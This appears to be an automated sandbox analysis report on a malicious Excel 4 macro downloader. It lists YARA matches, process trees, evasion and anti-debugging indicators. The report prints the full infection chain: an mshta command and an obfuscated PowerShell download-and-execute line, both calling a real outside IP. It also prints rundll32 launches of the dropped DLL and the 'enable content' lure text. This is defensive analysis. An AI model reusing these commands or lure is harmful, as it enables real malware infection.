Source: Yara match File source: 00000011.00000002.672589404.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613442141.00000000006C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675028637.0000000003161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613971338.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565128790.0000000000661000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565466027.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614142809.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.674472849.0000000002891000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672492274.0000000002340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614372731.0000000002DC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565096650.0000000000630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613198246.0000000000431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675215559.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.450462581.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510060149.0000000002161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.617473555.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.617627799.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510140052.0000000002280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671797398.0000000000330000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510293000.00000000027C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564986915.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565627998.00000000028A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509954832.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.616810767.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.674563401.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614197032.0000000002831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568578862.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565801844.0000000003151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671423407.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565866582.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614228489.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565599896.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED

System Summary

Source: 80_513972285.xls Macro extractor: Sheet: Macro1 contains: mshta
Source: 80_513972285.xls, type: SAMPLE Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
Source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 G
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 :: Previewing is not available for protected documents. 14 15 Yo
Source: Screenshot number: 8 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 G) I I 23 24 25 26
Source: 80_513972285.xls Stream path 'Workbook' : [binary stream dump omitted; readable content is the font table (Calibri, Calibri Light, Arial) and Excel number-format strings]
Source: 80_513972285.xls.0.dr Stream path 'Workbook' : [binary stream dump omitted; identical to the sample's Workbook stream apart from the embedded user name]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll
Source: 80_513972285.xls Initial sample: EXEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00348D71 14_2_00348D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033777B 14_2_0033777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033AB66 14_2_0033AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00351B54 14_2_00351B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034A156 14_2_0034A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00344B56 14_2_00344B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00331950 14_2_00331950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033F154 14_2_0033F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00342753 14_2_00342753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00350D5B 14_2_00350D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00340946 14_2_00340946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00343D41 14_2_00343D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033BB4B 14_2_0033BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033194C 14_2_0033194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00333FB8 14_2_00333FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00332FA1 14_2_00332FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003441A7 14_2_003441A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034C9A9 14_2_0034C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003499AA 14_2_003499AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034B391 14_2_0034B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00338D95 14_2_00338D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00351993 14_2_00351993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00331F9B 14_2_00331F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00337B82 14_2_00337B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00349186 14_2_00349186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034C38F 14_2_0034C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033F58F 14_2_0033F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033FD8C 14_2_0033FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00342BF6 14_2_00342BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034EBFF 14_2_0034EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003445CD 14_2_003445CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034D3C8 14_2_0034D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033CFCE 14_2_0033CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00347BCA 14_2_00347BCA
Source: 3DBB.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Source: 80_513972285.xls Macro extractor: Sheet name: Macro1
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026C67D DeleteService, 12_2_0026C67D
Source: 80_513972285.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: 80_513972285.xls, type: SAMPLE Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
Source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Klovgjl\ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Source: 80_513972285.xls OLE indicator, VBA macros: true
Source: 80_513972285.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/9@2/36
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: 80_513972285.xls OLE indicator, Workbook stream: true
Source: 80_513972285.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: 80_513972285.xls ReversingLabs: Detection: 33%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/qqw/aas/se.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDB50.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: 3DBB.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: C:\Windows\System32\mshta.exe Code function: 4_3_033A00C0 push 8B4902BAh; iretd 4_3_033A00C6
Source: C:\Windows\System32\mshta.exe Code function: 4_3_033A08C7 push 8B4902BAh; iretd 4_3_033A08CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034114C push ds; ret 9_2_0034114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003415F5 push cs; retf 9_2_003415FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0042114C push ds; ret 10_2_0042114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004215F5 push cs; retf 10_2_004215FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047114C push ds; ret 11_2_0047114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004715F5 push cs; retf 11_2_004715FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026114C push ds; ret 12_2_0026114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002615F5 push cs; retf 12_2_002615FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033114C push ds; ret 14_2_0033114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003315F5 push cs; retf 14_2_003315FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: QWER.dll.6.dr Static PE information: real checksum: 0x8f55d should be: 0x909dc

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Jdywrgg\axwj.zob:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\mshta.exe TID: 308 Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: rundll32.exe, 0000000F.00000002.613710689.000000000078A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035D374 mov eax, dword ptr fs:[00000030h] 9_2_0035D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0043D374 mov eax, dword ptr fs:[00000030h] 10_2_0043D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048D374 mov eax, dword ptr fs:[00000030h] 11_2_0048D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027D374 mov eax, dword ptr fs:[00000030h] 12_2_0027D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034D374 mov eax, dword ptr fs:[00000030h] 14_2_0034D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
